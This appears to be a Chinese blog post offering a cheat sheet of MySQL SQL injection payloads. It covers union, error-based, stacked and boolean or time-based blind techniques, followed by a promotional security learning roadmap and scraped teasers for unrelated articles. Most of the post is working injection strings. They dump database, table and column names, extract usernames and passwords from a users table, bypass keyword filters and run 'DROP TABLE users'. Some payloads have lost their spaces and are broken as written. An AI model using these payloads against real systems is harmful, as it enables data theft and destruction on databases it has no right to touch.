网络安全小宇哥
网络安全小宇哥

【2025版】最新渗透工程师手册:60个SQL注入Payload清单集合,从零基础到精通,收藏这篇就够了!_sql注入的payload

  • 联合注入Payload

  • 报错注入Payload

  • extractvalue函数

  • updatexml函数

  • BigInt数据类型溢出

  • floor函数

  • 堆叠注入Payload

  • 盲注Payload

  • 布尔盲注

SQL

联合注入Payload

#查字段   1' order by 1#   1' order by 100#   #联合查询(假设字段为3)   -1' union select 1,2,3# //-1使页面报错,方便显示   #查所有数据库名(假设回显为2)   -1' union select 1,database(),3#   -1' union select 1,database(),3 from information_schema.tables#   #查看版本   -1' union select 1,version(),3#   #查指定库的表名   -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='库名'#   #查指定表的列名   -1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='库名' and table_name='表名'#   #查看指定列名的内容   -1' union select 1,group_concat(列名1,0x3a,列名2),3 from 库名.列名#

报错注入Payload

extractvalue函数
#extractvalue() //空格和"="被过滤的情况   1'^extractvalue(1,concat(0x5c,(select(database()))))# //爆库名   1'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('库名'))))# //查表名   1'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('表名'))))# //查列名   1'^extractvalue(1,concat(0x7e,(select(left(列名,30))from(库名.表名))))# //查从左数30个字段   1'^extractvalue(1,concat(0x7e,(select(right(列名,30))from(库名.表名))))#
updatexml函数
#updatexml()函数   1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)# //爆库   1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='库名' limit 0,1),0x7e),1)# //查表名   1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),0x7e),1)# //查列名   1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)# //查数据
BigInt数据类型溢出
#BigInt数据类型溢出--exp()或pow()   1' and exp(~(select * from (select user())a))# //查看当前库的权限   1' and exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a))# //查表名   1' and exp(~(select * from (select column_name from information_schema.columns where table_name='表名' limit 0,1)a))# //查列名   1' and exp(~(select * from(select '列名' from '表名' limit 0,1)))# //获取对应信息
floor函数
#floor()函数   1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

堆叠注入Payload

常规查询语句
`1';show databases;# //查库名·   1';show tables;# //查表名   1';show columns from `表名`;# //查列名,表名用反引号包围   `
rename改表改列
`1';RENAME TABLE `表1` TO `表2`;RENAME TABLE `表3` TO `表1`;ALTER TABLE `表1` CHANGE `列1` `列2` VARCHAR(100) ;show columns from 表1;# //将表1改名为表2,将表3改名为表1,再将表1的列1改为列2,最后查看表1的列名信息 //适用于查看没有权限的表   `
handler读取表中数据
1';HANDLER 表名 OPEN;HANDLER 表名 READ FIRST;HANDLER 表名 CLOSE;# //此方法使用于在查列时select被禁的情况,逻辑为打开指定表名,读取表中第一行数据,关闭表并释放资源。
set转换操作符
1;set sql_mode=PIPES_AS_CONCAT;select 1 //适用于后端代码采用'||'判断的情况。
sql预处理
`PREPARE hacker from concat('s','elect', ' * from `表名` ');   EXECUTE hacker;# //绕过特定字符串的过滤   set@a=hex编码值;prepare hacker from @a;execute hacker;# //结合hex(进制)编码实现绕过   `

盲注Payload

基于布尔盲注Payload:

  1. id=1 AND (SELECT COUNT(*) FROM users) > 0

  2. id=1 AND SUBSTRING((SELECT version()), 1, 1) = '5'

  3. id=1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'), 1, 1)) = 97

  4. id=1 AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='public') > 10

  5. id=1 AND LENGTH((SELECT database())) = 6

基于时间盲注Payload:

  1. id=1; IF((SELECT COUNT(*) FROM users) > 0, SLEEP(5), NULL)

  2. id=1; IF((SELECT ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'), 1, 1))) = 97, BENCHMARK(10000000, MD5('a')), NULL)

  3. id=1; IF(EXISTS(SELECT * FROM information_schema.tables WHERE table_schema='public' AND table_name='users'), BENCHMARK(5000000, SHA1('a')), NULL)

  4. id=1; IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users') = 5, SLEEP(2), NULL)

  5. id=1; IF((SELECT SUM(LENGTH(username)) FROM users) > 20, BENCHMARK(3000000, MD5('a')), NULL)

错误基于盲注Payload:

  1. id=1 UNION ALL SELECT 1,2,table_name FROM information_schema.tables

  2. id=1 UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users'

  3. id=1 UNION ALL SELECT username,password,3 FROM users

  4. id=1'; SELECT * FROM users WHERE username='admin' --

  5. id=1'; DROP TABLE users; --

布尔盲注
判断数据库名称长度
1' and length(database())>20 #   //判断数据库名称长度是否大于20   


SELECT length('Hello World');  -- 输出 11   SELECT length(column_name) FROM table_name;  -- 计算表中某一列的长度
获取数据库名称组成
`1' and ascii(substr(database(),1,1))>20 #`
判断表个数
1' and (select count(table_name) from information_schema.tables where table_schema=database()) <10#
获取表名称长度
1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) > 10 #   


`1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 #`     


`//第一个字符   1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))判断表达式 #           //第二个字符   1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))判断表达式 #           //第三个字符   1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))判断表达式 #`
获取列数
`1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='表名')判断表达式 #`
获取列名长度
//判断第一个列名长度   1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))判断表达式 #      //判断第二个列名长度   1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 1,1),1))判断表达式 #
获取列名字符组成
//获取 users 表中第一个列名的第一个字符   1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users'limit0,1),1,1))判断表达式 #      //获取 users 表中第二个列名的第一个字符   1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),1,1))判断表达式 #      //获取 users 表中第三个列名的第一个字符   1'andascii(substr((select column_name from information_schema.columns where table_name = 'users'limit2,1),1,1))判断表达式 #      //获取 users 表中第三个列名的第二个字符   1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 2,1),2,1))判断表达式 #      //获取 users 表中第三个列名的第三个字符   1'andascii(substr((select column_name from information_schema.columns where table_name = 'users'limit2,1),3,1))判断表达式 #
获取字段长度
//获取列中第一个字段长度   1' and length(substr((select user from users limit 0,1),1))判断表达式 #      //获取列中第二个字段长度   1' and length(substr((select user from users limit 1,1),1))判断表达式 #
获取字段
//获取第一个字段的第一个字符   1' and ascii(substr((selectuserfromuserslimit0,1),1,1))判断表达式 #   //获取第一个字段的第二个字符   1' and ascii(substr((select user from users limit 0,1),2,1))判断表达式 #   //获取第二个字段的第一个字符   1'andascii(substr((selectuserfromuserslimit1,1),1,1))判断表达式 #   //获取第二个字段的第二个字符   1' and ascii(substr((select user from users limit 1,1),2,1))判断表达式 #
判断数据库名称长度
1' and if(length(database())=1,sleep(5),1)    if(expr1,expr2,expr3)函数:
判断数据库名称组成
1' and if(ascii(substr(database(),1,1))>90,sleep(5),1)#
判断表个数
`1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)`
获取表名称长度
1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9,sleep(5),1) #
获取表名称组成
1' and (select ascii(substr(table_name, 1, 1)) from information_schema.tables where table_schema = 'dvwa' limit 1) >= 100 and sleep(5)#   


//获得第一个表名称的第二个字符   1' and (select ascii(substr(table_name, 2, 1)) from information_schema.tables where table_schema = 'dvwa' limit 1)判断表达式 and sleep(5)#      //获得第一个表名称的第三个字符   1' and (select ascii(substr(table_name, 3, 1)) from information_schema.tables where table_schema = 'dvwa' limit 1)判断表达式 and sleep(5)#   


//获得第二个表名称的第一个字符   1' and (selectascii(substr(table_name, 1, 1)) from (select table_name from information_schema.tables where table_schema = 'dvwa'limit1,1) as second_table limit1) 判断表达式 andsleep(5)#      //获得第二个表名称的第二个字符   1' and (select ascii(substr(table_name, 2, 1)) from (select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1) as second_table limit 1) 判断表达式 and sleep(5)#      //获得第二个表名称的第三个字符   1'and (selectascii(substr(table_name, 3, 1)) from (select table_name from information_schema.tables where table_schema = 'dvwa'limit1,1) as second_table limit1) 判断表达式 andsleep(5)#      //以此类推
获取列数
`1' and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name= 'guestbook')=3,sleep(5),1) #`
获取列名长度
1' and if(length(substr((select column_name from information_schema.columns where table_name= 'guestbook' limit 0,1),1))判断表达式,sleep(5),1) #
获取列名字符组成

获取第一个列名的第一个字符

1' and if((select ascii(substr(column_name, 1, 1)) from information_schema.columns where table_name = 'guestbook' limit 0,1) = 判断表达式, sleep(5), 1) #   


//获取第一个列名的第二个字符   1' and if((selectascii(substr(column_name, 2, 1)) from information_schema.columns where table_name = 'guestbook'limit0,1) = 判断表达式, sleep(5), 1) #   //获取第一个列名的第三个字符   1' and if((select ascii(substr(column_name, 3, 1)) from information_schema.columns where table_name = 'guestbook' limit 0,1) = 判断表达式, sleep(5), 1) #   //获取第二个列名的第一个字符   1'andif((selectascii(substr(column_name, 1, 1)) from information_schema.columns where table_name = 'guestbook'limit1,1) = ASCII_VALUE, sleep(5), 1) #   //获取第二个列名的第二个字符   1' and if((select ascii(substr(column_name, 2, 1)) from information_schema.columns where table_name = 'guestbook' limit 1,1) = ASCII_VALUE, sleep(5), 1) #   //获取第二个列名的第三个字符   1'andif((selectascii(substr(column_name, 3, 1)) from information_schema.columns where table_name = 'guestbook'limit1,1) = ASCII_VALUE, sleep(5), 1) #   //获取第三个列名的第一个字符   1' and if((select ascii(substr(column_name, 1, 1)) from information_schema.columns where table_name = 'guestbook' limit 2,1) = ASCII_VALUE, sleep(5), 1) #
获取字段
1' and if((select ascii(substring(column_name, 1, 1)) from information_schema.columns where table_name = 'users' limit 0,1)判断表达式, sleep(5), 1) #   


//获取 user 列名的第一个字段的第二个字符   1' and if((selectascii(substring(column_name, 2, 1)) from information_schema.columns where table_name = 'users'limit0,1)判断表达式, sleep(5), 1) #   //获取 user 列名的第一个字段的第三个字符   1' and if((select ascii(substring(column_name, 3, 1)) from information_schema.columns where table_name = 'users' limit 0,1)判断表达式, sleep(5), 1) #   //获取 user 列名的第二个字段的第一个字符   1'andif((SELECTASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE table_name = 'users'LIMIT1, 1)判断表达式, sleep(5), 1) #   //获取 user 列名的第二个字段的第二个字符   1' and if((SELECT ASCII(SUBSTRING(column_name, 2, 1)) FROM information_schema.columns WHERE table_name = 'users' LIMIT 1, 1)判断表达式, sleep(5), 1) #   //获取 user 列名的第二个字段的第三个字符   1'andif((selectascii(substring(column_name, 3, 1)) from information_schema.columns where table_name = 'users'limit1,1)判断表达式, sleep(5), 1) #

网络安全学习路线&学习资源

【2025版】最新渗透工程师手册:60个SQL注入Payload清单集合,从零基础到精通,收藏这篇就够了!_sql注入的payload_第1张图片

网络安全的知识多而杂,怎么科学合理安排?

下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!

初级网工

1、网络安全理论知识(2天)

①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)

①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)

①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)

①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)

①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)

①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

【“脚本小子”成长进阶资源领取】

7、脚本编程(初级/中级/高级)

在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。

8、超级网工

这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。

网络安全工程师企业级学习路线

如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。

一些我自己买的、其他平台白嫖不到的视频教程:

需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。

【2025版】最新渗透工程师手册:60个SQL注入Payload清单集合,从零基础到精通,收藏这篇就够了!_sql注入的payload_第2张图片

结语

网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。

特别声明:

此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!

你可能感兴趣的:(sql,数据库,web安全,测试工具,计算机网络,安全,网络)

  • 粒子群算法的原理与实现示例 禺垣 人工智能算法粒子群算法群体智能优化算法
      粒子群算法(ParticleSwarmOptimization,PSO)是一种基于群体智能的优化算法,由Kennedy和Eberhart于1995年提出,其灵感来源于鸟群觅食、鱼群游动等自然界中群体行为的协作与信息共享机制。该算法通过模拟群体中个体(粒子)的运动和信息交互,在解空间中搜索最优解,具有实现简单、收敛速度快、参数少等特点,被广泛应用于函数优化、神经网络训练、工程设计等领域。一、算法
  • 软件测试系列--白盒测试覆盖率的问题 测试届老纪 软件测试职场和发展软件测试
    覆盖率##一、覆盖率的概念###覆盖率是用来度量测试完整性的一个手段,现在有越来越多的测试工具能够支持覆盖率测试,但是它们本身并不包含测试技术,只是测试技术有效性的一个度量。白盒测试中经常用到的覆盖率是逻辑覆盖率。二、覆盖率的目的###覆盖率对于软件测试有着非常重要的作用,通过覆盖率我们可以知道我们的测试是否充分,我们测试的弱点在哪些方面,进而指导我们设计能够增加覆盖率的测试用例,有效的提高测试质
  • Fortinet Security Fabric 解决方案:构建智能化、一体化的网络安全防御体系 江苏思维驱动智能研究院有限公司 安全fabricweb安全
    一、方案背景与核心价值:应对数字化时代的安全挑战在云计算、物联网、远程办公等技术普及的背景下,企业网络边界逐渐模糊,攻击面呈指数级扩展。传统单点安全产品难以应对多维度威胁渗透,而FortinetSecurityFabric(安全架构)以“集成化、自动化、智能化”为核心,通过安全能力的协同联动与威胁情报共享,构建覆盖全网络环境的动态防御体系。其核心价值在于:打破安全孤岛:整合分散的安全组件,避免多产
  • Amazon Lightsail 全解析:中小企业上云
    在企业数字化转型的浪潮中,越来越多的中小企业、创业团队和个人开发者开始寻求更简单、成本更可控的云服务解决方案,AWS推出了专为轻量应用打造的一站式云服务平台——AmazonLightsail。它集计算、存储、网络、数据库、容器等能力于一体,以极低的学习成本和固定月费的定价模式,帮助用户快速启动并管理Web项目、API服务、数据库应用等。本文我将带您全面了解Lightsail的功能优势、应用场景以及
  • Google AI 刚刚开源 MCP 数据库工具箱,让 AI 代理安全高效地查询数据库 新加坡内哥谈技术 人工智能
    每周跟踪AI热点新闻动向和震撼发展想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领域的领跑者。点击订阅,与未来同行!订阅:https://rengongzhineng.io/https://github.com/googleapis/genai-toolboxG
  • 329. 矩阵中的最长递增路径C语言
    给定一个mxn整数矩阵matrix,找出其中最长递增路径的长度。对于每个单元格,你可以往上,下,左,右四个方向移动。你不能在对角线方向上移动或移动到边界外(即不允许环绕)。来源:力扣(LeetCode)链接:https://leetcode-cn.com/problems/longest-increasing-path-in-a-matrix著作权归领扣网络所有。商业转载请联系官方授权,非商业转载
  • 116、掌握Docker Compose与Kubernetes:Rust应用部署实操 多多的编程笔记 Rust之Web开发dockerkubernetesrust
    Rust部署与运维:掌握使用DockerCompose、Kubernetes等工具进行应用部署和管理1.引言Rust是一种注重性能、安全和并发的系统编程语言。近年来,随着云计算和微服务架构的普及,如何将Rust应用部署到生产环境中,成为越来越多开发者关注的问题。本文将介绍如何使用DockerCompose和Kubernetes等工具进行Rust应用的部署和管理。2.DockerCompose简介D
  • 大同小异——服务器环境搭建 sohoAPI 【工具】服务器mysqllinuxflask
    干货满满,带你玩转不同服务器配置,以Linux操作系统为例,这里使用云服务,像阿里云云服务购买成功,查看到之后只是一个界面信息,如果想要使用它,则需要远程连接java环境主要配置三个:jdk—java应用程序开发或者运行必须得有Java环境MysQL----如果我们要去开发一个项目,那么项目中的数据必须放到数据库中持久化存储tomcat–专门用来部署Java应用程序的一款软件配置jdk安装包地址将
  • MATLAB 实现 SRCNN 图像超分辨率重建 leo__520 matlab超分辨率重建开发语言
    SRCNN代码实现。该代码使用三层卷积神经网络,进行图像的超分辨率重建,效果比双三次插值好很多SRCNN/Readme.txt,1494SRCNN/SRCNN.m,1267SRCNN/Set14/baboon.bmp,720054SRCNN/Set14/barbara.bmp,1244214SRCNN/Set14/bridge.bmp,263222SRCNN/Set14/coastguard.bm
  • JDBC操作数据库1
    步骤1.注册驱动(Class.forName)作用:让Java识别数据库类型(比如MySQL、Oracle)。细节:MySQL8.0+版本可省略这一步(驱动会自动加载),但老版本必须写。从MySQL8.0的JDBC驱动开始,mysql-connector-java驱动包在META-INF/services目录下提供了java.sql.Driver文件,内容为com.mysql.cj.jdbc.Dr
  • INNER JOIN, LEFT JOIN, RIGHT JOIN 的区别 烟沙九洲 数据库数据库mysql
    今天我们来一起探索下JOIN,JOIN作为数据库操作的核心概念,用于合并两个或多个表中的数据。一、JOIN(INNERJOIN)1、基本功能:返回两个表中匹配成功的行。2、特点:只保留两表中都满足连接条件的记录;如果某行在一个表中存在但在另一个表中没有匹配项,则该行不会出现在结果中;结果集的行数≤两个原表的行数。3、语法:SELECTcolumnsFROMtable1[INNER]JOINtabl
  • iOS 12.2 真机测试实战指南:全面掌握16E226测试要点 Ready-Player
    本文还有配套的精品资源,点击获取简介:在iOS开发中,真机测试对于确保应用在不同设备上的性能和兼容性至关重要。本文深入解析了iOS12.2版本和特定的构建号16E226,包括新功能和改进点。重点介绍了开发者在进行真机测试时应关注的方面,如兼容性、性能、新特性集成、UI适配、错误和崩溃的修复、权限请求处理、网络连接稳定性及安全性。通过本文,开发者能够学习如何使用真机测试包16E226来优化应用,确保
  • 基于python的api扫描器系统的设计与实现
    博主介绍:✌在职Java研发工程师、专注于程序设计、源码分享、技术交流、专注于Java技术领域和毕业设计✌温馨提示:文末有CSDN平台官方提供的老师Wechat/QQ名片:)Java精品实战案例《700套》2025最新毕业设计选题推荐:最热的500个选题o( ̄▽ ̄)d介绍在当今数字化社会,网络安全问题日益突出,为了有效识别和防范网络威胁,开发一款全面的Web应用渗透测试系统至关重要。本研究基于Py
  • AIGC领域AI作画:在数字雕塑中的应用实践 AI原生应用开发 AI原生应用开发AIGCAI作画ai
    AIGC领域AI作画:在数字雕塑中的应用实践关键词:AIGC、AI作画、数字雕塑、生成对抗网络、3D建模、艺术创作、深度学习摘要:本文深入探讨了AIGC(人工智能生成内容)技术在数字雕塑领域的创新应用。我们将从技术原理、算法实现到实际案例,全面解析AI如何赋能传统数字雕塑创作流程。文章首先介绍AIGC在艺术创作中的背景和发展现状,然后详细讲解核心算法原理和数学模型,接着通过实际项目案例展示AI作画
  • Python爬虫实战:使用Scrapy和Selenium高效爬取USPTO美国专利数据 Python爬虫项目 2025年爬虫实战项目python爬虫scrapy开发语言selenium测试工具
    引言在当今的知识经济时代,专利数据蕴含着巨大的商业和技术价值。美国专利商标局(USPTO)作为全球最大的专利数据库之一,收录了数百万项专利信息,这些数据对于企业竞争分析、技术趋势预测和学术研究都具有重要意义。本文将详细介绍如何使用Python构建一个高效、稳定的USPTO专利数据爬虫系统。一、USPTO专利数据库概述1.1USPTO数据库结构USPTO提供了多种访问专利数据的途径:专利全文和图像数
  • iOS 性能测试工具全流程:主流工具实战对比与适用场景 2501_91600747 httpudphttpswebsocket网络安全tcp/ip
    在iOS开发中,性能优化往往被安排到开发后期,甚至上线前才临时补救。但性能瓶颈通常是架构设计、资源加载、动画机制等多方面共同作用的结果,仅凭肉眼感知和log输出,难以精准定位。一套合适的性能测试工具组合,不仅能帮助开发者在早期识别潜在问题,还能在迭代阶段快速验证改动效果。本文从实战角度出发,汇总市面上主流的iOS性能测试工具,分析它们各自适用的场景与边界,为开发者构建适合自身项目的调试方案提供参考
  • iPhone 抓包工具有哪些?多工具对比分析优缺点 2501_91591841 httpudphttpswebsocket网络安全网络协议tcp/ip
    iOS平台一向以安全性著称,这也使得对其进行网络调试和抓包变得异常困难。相比安卓,iPhone抓包难点主要在以下几点:系统限制代理设置的灵活性无法自由安装根证书抓包常涉及HTTPS解密与双向认证破解普通用户设备无root或越狱权限因此,选择一款合适的iPhone抓包工具成为开发和测试流程中至关重要的一环。本文整理了当前主流的iOS抓包工具,分别从功能范围、使用难度、兼容性和适用场景进行横向对比,希
  • C语言——字符串两种声明初始化方式、输入输出及常见处理函数 hardStudy_h c语言开发语言
    C语言中的字符串是一个字符数组,它以空字符(\0)作为结束标志。这意味着字符串中的字符是连续存储在内存中的,而字符串的末尾会自动添加一个\0字符来表示字符串的结束。这种表示方式使得C语言在处理字符串时非常灵活,但也要求程序员在创建和修改字符串时小心处理,以避免缓冲区溢出等安全问题。字符串的声明和初始化1.字符数组初始化当你使用字符数组来定义字符串时,你可以在声明时直接初始化它,或者稍后通过其他方式
  • Linux——虚拟机网络配置
    进行虚拟机网络配置是确保虚拟机能够正常访问网络、与宿主机及其他设备进行通信的关键步骤。虚拟机网络配置允许用户根据实际需求选择合适的网络模式,并调整网络参数以满足特定的网络环境要求。虚拟机常见的三种网络模式包括桥接模式、NAT模式和主机模式,每种模式在配置、特点和对网络的影响上都有所不同:一、桥接模式(比较消耗IP地址)配置特点:虚拟机的网络适配器与物理网络适配器直接连接,虚拟机和物理网络中的其他设
  • Vlang编写轻量化多线程爬虫 q56731523 爬虫typescript开发语言前端
    Vlang作为新兴语言,他简单、快速和安全让爬虫有不一样的体验。在V中,并发模型基于轻量级的协程(称为goroutines,类似于Go语言的goroutine)和通道(channels)来实现。虽然说V语言目前还在快速发展中,但它的并发特性已经可以用于构建多线程(实际上是协程)应用程序,例如网络爬虫。所以说,用V语言(Vlang)完全支持编写多线程爬虫。它提供了强大的并发模型和网络库,非常适合高效
  • 【家政平台开发(93)】解锁家政新视界:VR/AR在家政平台的奇妙旅程 奔跑吧邓邓子 家政平台开发家政平台开发VRAR虚拟现实增强现实应用实践
    本【家政平台开发】专栏聚焦家政平台从0到1的全流程打造。从前期需求分析,剖析家政行业现状、挖掘用户需求与梳理功能要点,到系统设计阶段的架构选型、数据库构建,再到开发阶段各模块逐一实现。涵盖移动与PC端设计、接口开发及性能优化,测试阶段多维度保障平台质量,部署发布阶段确保平稳上线。还深入探讨运营策略、技术创新应用及未来发展方向,为家政平台开发提供全面且实用的知识体系与实践指南。目录一、VR/AR在家
  • 计算机网络第三章——数据链路层(考研和期末复习都适用) 成为佬 计算机网络背诵码住!计算机网络考研网络协议
    目录1、数据链路层使用的信道2.数据链路层概述3.数据链路层的三个重要问题:封装成帧、差错检测、可靠传输。封装成帧透明传输差错检测循环冗余检验的原理(CRC):冗余码的计算冗余码的计算举例帧检验序列FCSps:4.点对点协议PPP(目前使用最广泛的数据链路层协议)PPP协议的特点PPP协议应满足的需求PPP协议的组成PPP协议的帧格式5.使用广播信道的数据链路层局域网的数据链路层媒体共享技术:以太
  • 我是如何搭建了一个企业级PDF处理平台的 wh3933 pdf架构
    第一部分:执行摘要与架构愿景1.1.拟议解决方案概述本文旨在为构建一个模块化、高鲁棒性、可扩展的企业级PDF处理平台提供全面的架构设计与技术实现蓝图。该平台的核心功能集成了虚拟打印、PDF创建、光学字符识别(OCR)以及高级加密,以满足现代企业对文档工作流自动化和安全性的严苛要求。为了实现这一目标,我们提出一个清晰的、关注点分离的系统架构。该架构将整个解决方案解耦为两个核心部分:一个部署在用户工作
  • 计算机网络——数据链路层—局域网和广域网 玖 萬 计算机网络服务器网络
    一、局域网的基本概念和体系结构•局域网LAN通常是指在一个较小的地理范围内(一般在几十米到几公里之间),利用通信线路将许多数据设备连接起来,实现资源和信息共享的互联网络。•局域网最主要的特点是:网络为一个单位所拥有,且地理范围和站点数目均有限。除此之外,局域网还具有较高的速率、较低的时延和较低的误码率、各站为平等关系而非主从关系、能进行广播和组播等特点。•决定局域网特性的主要因素包括三个方面:即网
  • 虚拟局域网(VLAN) m0_73882020 计算机网络
    虚拟局域网(VLAN)的ID是用于标识同一VLAN中设备的数字标签。VLAN的作用是在同一个物理网络设备(如交换机)上,将不同的设备分隔成逻辑上的多个局域网。不同VLAN的设备无法直接通信,除非通过路由器或三层交换机。这种技术提高了网络的安全性、管理性和效率。VLANID说明:VLANID范围:1-4094。ID结构:VLANID是一个12位的标识符,范围是1到4094,其中一些ID具有特殊用途或
  • Raiden Network(一)—— Overview YzYzYzzzzz RaidenNetwork区块链RaidenNetwork
    RaidenNetwork的优点:可扩展性:当前大多数区块链的容量都有固定或半固定的限制,而雷电网络的容量与参与者数量成正比快速地:可以在亚秒内确认转移私人的:个人转账不会出现在全球共享账本中可互操作:适用于任何遵循以太坊标准化令牌API(ERC20)的令牌低费用:转账费用可能比区块链低几个数量级小额付款:低交易费用允许有效地转移微小的价值RaidenNetwork的各种资料网址:RaidenNe
  • 分布式生成 ID 策略的演进和最佳实践,含springBoot 实现(Java版本)
    一、背景在单体架构中,ID通常使用数据库自增或UUID即可满足需求。但在微服务、分布式环境中,这些方式存在性能瓶颈、重复冲突、时序不全等问题。因此,分布式ID生成策略应运而生,用于确保在高并发、跨节点、异地部署的系统中,生成全局唯一、趋势递增、高性能的ID。二、演进历程单机自增ID(如数据库自增)Java原生UUID工具类生成(如雪花算法、KeyUtil等)中间件分布式协调(如Zookeeper、
  • 吐血整理!电动车安全充电原理大公开!:比如我有一辆48度的电动汽车,我在高速上遇到480kw充电桩,如何能够保证汽车安全充电,汽车安全充电的原理是什么 -慧知开源充电桩平台 文慧的科技江湖 更新日志-(慧哥)慧知充电桩平台安全汽车大数据人工智能架构开源直流充电桩
    确保电动汽车在480kW超充桩上安全充电的核心在于电池管理系统(BMS)、热管理系统、充电桩与车辆的智能协同保护机制。安全充电的核心原理智能功率协商(握手协议)充电前,车辆BMS会与充电桩通信,自动协商最大可接受功率(如您的48度电池可能峰值仅支持100-150kW,而非480kW)。实际充电功率由车辆BMS决定,而非充电桩。充电桩仅提供“可用功率上限”,车辆只会取用自身能承受的部分。电池管理系统
  • 车载以太网-TC8测试-UT(Upper Tester) 天赐好车 车载以太网车载以太网TC8UT
    目录一、技术原理:指令体系与协议适配1.**指令格式与传输机制**2.**协议栈交互逻辑**3.**规范遵循与版本演进**二、测试应用:TC8测试场景与案例1.**TCP协议栈深度验证**2.**ARP协议健壮性测试**3.**SOME/IP服务动态管理**三、实现挑战与解决方案1.**实时性要求**2.**安全性风险**3.**协议栈适配差异**四、集成流程与工具链1.**UT开发与部署**2.
  • Java零基础之自定义异常类! 菜鸟不学编程 Java从入门到放弃java开发语言
